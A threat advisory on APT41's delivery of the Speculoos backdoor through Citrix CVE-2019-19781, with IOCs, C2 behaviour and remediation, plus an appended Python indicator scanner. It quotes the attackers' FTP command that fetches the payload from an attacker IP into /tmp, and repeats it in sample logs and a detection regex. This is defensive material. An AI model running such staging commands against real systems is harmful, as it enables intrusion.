
Severity
High
Analysis Summary
The global attack campaign by APT41 reported earlier by FireEye appears to be ongoing. The threat actors have been targeting Citrix, Cisco, and Zoho network appliances by exploiting recently disclosed vulnerabilities. The payload samples targeting Citrix appliances were executables compiled to run on FreeBSD. Victims have been identified in industries such as healthcare, higher education, manufacturing, government and technology services, in regions including North America, South America, and Europe. The new backdoor Speculoos is being delivered by exploiting the Citrix vulnerability CVE-2019-19781.

Speculoos was delivered by exploiting CVE-2019-19781, a vulnerability affecting the Citrix Application Delivery Controller, Citrix Gateway, and Citrix SD-WAN WANOP appliances that allows an adversary to remotely execute arbitrary commands. As reported by FireEye, the exploit directed the victim appliances to retrieve Speculoos over FTP using the command /usr/bin/ftp -o /tmp/bsd ftp://test:[redacted]\@66.42.98[.]220/<filename>. The Speculoos backdoor is an ELF executable compiled with GCC 4.2.1 to run on a FreeBSD system.
Upon execution, the payload enters a loop that calls a function to communicate with its command and control (C2) domain over TCP/443. If it is unable to communicate with that domain, Speculoos attempts to use a backup C2 at 119.28.139[.]20, also over TCP/443. If it connects to either C2 server, it carries out a TLS handshake with the server, using a buffer hardcoded in the binary as the first packet of the handshake. Before sending the hardcoded buffer to the C2 server, Speculoos modifies offset 11 with the current time and offset 15 with 28 pseudorandom bytes, generated by iterating through the domain string, adding the current time, and then XORing each byte with 7 multiplied by the byte's offset as the key.
Impact
- Remote code execution
- Data exfiltration
- Data manipulation
- Process termination
Indicators of Compromise
Domain Name
- alibaba[.]zzux[.]com
- exchange[.]longmusic[.]com
MD5
- 6edb5def1d82d09bf827d85cb42ab07e
- c33754d068954ec9a61cc9165334a57e
SHA-256
- 99c5dbeb545af3ef1f0f9643449015988c4e02bf8a7164b5d6c86f67e6dc2d28
- 6943fbb194317d344ca9911b7abb11b684d3dca4c29adcbcff39291822902167
Source IP
- 119[.]28[.]139[.]20
- 119[.]28[.]139[.]120
- 66[.]42[.]98[.]220
Remediation
- Block the threat indicators at their respective controls.
- Keep all Citrix software updated to the latest versions.
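As an added example that is not part of the original advisory, the following Python script scans log lines for the indicators listed above: it refangs the defanged domains and IPs, matches them as whole tokens so that 119.28.139.20 does not fire on 119.28.139.200, checks file hashes against the listed MD5/SHA-256 values, and flags the reported FTP staging command shape. The sample DNS, firewall, shell and EDR lines are constructed for the demonstration.

```python
import re

# Indicators from the advisory, kept in their defanged form.
IOC_DOMAINS = {"alibaba[.]zzux[.]com", "exchange[.]longmusic[.]com"}
IOC_IPS = {"119[.]28[.]139[.]20", "119[.]28[.]139[.]120", "66[.]42[.]98[.]220"}
IOC_HASHES = {
    "6edb5def1d82d09bf827d85cb42ab07e", "c33754d068954ec9a61cc9165334a57e",
    "99c5dbeb545af3ef1f0f9643449015988c4e02bf8a7164b5d6c86f67e6dc2d28",
    "6943fbb194317d344ca9911b7abb11b684d3dca4c29adcbcff39291822902167",
}
# Staging command shape reported in the advisory: ftp fetch of the payload into /tmp.
FTP_STAGE_RE = re.compile(r"/usr/bin/ftp\s+-o\s+/tmp/\S+\s+ftp://[^\s\"']+")
HASH_RE = re.compile(r"\b[0-9a-f]{32}\b|\b[0-9a-f]{64}\b")

def refang(indicator):
    """Turn a defanged indicator (alibaba[.]zzux[.]com) back into a matchable string."""
    return indicator.replace("[.]", ".")

def _exact_re(value):
    # No word character or dot on either side, so an IP is not matched inside a
    # longer IP and a domain is not matched inside a longer host name.
    return re.compile(r"(?<![\w.])" + re.escape(value) + r"(?![\w.])")

DOMAIN_RES = {d: _exact_re(refang(d)) for d in IOC_DOMAINS}
IP_RES = {i: _exact_re(refang(i)) for i in IOC_IPS}

def scan_line(line):
    """Return (kind, indicator) hits for one log line; indicators are reported defanged."""
    hits = [("domain", d) for d, rx in DOMAIN_RES.items() if rx.search(line)]
    hits += [("ip", i) for i, rx in IP_RES.items() if rx.search(line)]
    hits += [("hash", h) for h in HASH_RE.findall(line.lower()) if h in IOC_HASHES]
    staging = FTP_STAGE_RE.search(line)
    if staging:
        hits.append(("ftp_staging", staging.group(0)))
    return hits

def scan_log(lines):
    """Scan an iterable of log lines; return [(line_number, kind, indicator), ...]."""
    return [(n, kind, v) for n, line in enumerate(lines, 1) for kind, v in scan_line(line)]

# Constructed sample lines (DNS, firewall, appliance shell, EDR), not real telemetry.
SAMPLE_LOG = [
    "2020-04-14T10:03:11Z dns client=10.1.2.3 qname=exchange.longmusic.com qtype=A",
    "2020-04-14T10:03:12Z fw allow src=10.1.2.3 dst=119.28.139.120 dport=443 proto=tcp",
    "2020-04-14T10:03:13Z fw allow src=10.1.2.4 dst=119.28.139.200 dport=443 proto=tcp",
    '2020-04-14T10:05:40Z sh cmd="/usr/bin/ftp -o /tmp/bsd ftp://test:REDACTED@66.42.98.220/<filename>"',
    "2020-04-14T10:06:01Z edr file=/tmp/bsd sha256=99c5dbeb545af3ef1f0f9643449015988c4e02bf8a7164b5d6c86f67e6dc2d28",
]

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit)
```

The hits are reported in their defanged form so they can be pasted into a ticket or blocklist without triggering URL handlers.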